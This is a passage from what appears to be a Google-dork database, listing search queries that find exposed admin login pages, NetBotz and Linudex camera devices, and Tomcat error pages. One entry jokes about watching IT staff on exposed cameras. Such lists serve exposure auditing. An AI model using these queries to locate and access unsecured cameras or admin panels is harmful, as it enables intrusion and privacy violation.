see h**p://beacon.dast.nlanr.net[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intext%3A%22Target+Multicast+Group%22+%22beacon%22&btnG=Search[url]] [[dork]intext:"Target Multicast Group" "beacon"[dork]] [end][1772]] [[start][1773] [[title](intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb")[[title]] [[descr]Logins for Forums powered by UBB.threads[descr]] [[url]http://www.google.com/search?q=(intitle:%22Please+login+-+Forums+powered+by+UBB.threads%22)%7C(inurl:login.php+%22ubb%22)&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork](intitle:"Please login - Forums powered by UBB.threads")|(inurl:login.php "ubb")[dork]] [end][1773]] [[start][1774] [[title]intitle:"Device Status Summary Page" -demo[[title]] [[descr]hxxp://www.netbotz.com/products/index.html
Network/server/room security and environmental alarm device.
O yea, they have cameras on them, fun to watch IT people......
woo
Includes:
Temperature (°F)
Humidity (%)
Air Flow (ft/min)
Audio Alarm:
Door Switch:[descr]] [[url]http://www.google.com/search?q=intitle:%22Device+Status+Summary+Page%22+-demo&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:"Device Status Summary Page" -demo[dork]] [end][1774]] [[start][1775] [[title](intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")[[title]] [[descr]Login Pages for WebMyStyle.
"WebMyStyle offers a full range of web hosting and dedicated server plans, but also gives you the ability to pick and choose the features that you need for your web sites."[descr]] [[url]http://www.google.com/search?q=(intitle:%22WmSC+e-Cart+Administration%22)%7C(intitle:%22WebMyStyle+e-Cart+Administration%22)&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork](intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")[dork]] [end][1775]] [[start][1776] [[title]inurl:"av_viewer.html" | inurl:"av_contents1.html" | inurl:"j_contents1.html" | inurl:"j_viewer.html" -site:altcode.com[[title]] [[descr]Finds all cameras by manufacturer Linudex
h**p://linudix.com/ [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22av_viewer.html%22+%7C+inurl%3A%22av_contents1.html%22+%7C+inurl%3A%22j_contents1.html%22+%7C+inurl%3A%22j_viewer.html%22+-site%3Aaltcode.com&btnG=Search[url]] [[dork]inurl:"av_viewer.html" | inurl:"av_contents1.html" | inurl:"j_contents1.html" | inurl:"j_viewer.html" -site:altcode.com[dork]] [end][1776]] [[start][1777] [[title]intitle:"eXist Database Administration" -demo[[title]] [[descr]Login Pages
"eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools.
The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features."[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22eXist+Database+Administration%22+-demo&btnG=Search[url]] [[dork]intitle:"eXist Database Administration" -demo[dork]] [end][1777]] [[start][1778] [[title]intitle:"Apache Tomcat" "Error Report"[title]] [[descr]Apache Tomcat Error messages. These can reveal various kinds of information depending on the type of error.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Apache+Tomcat%22+%22Error+Report%22[url]] [[dork]intitle:"Apache Tomcat" "Error Report"[dork]] [end][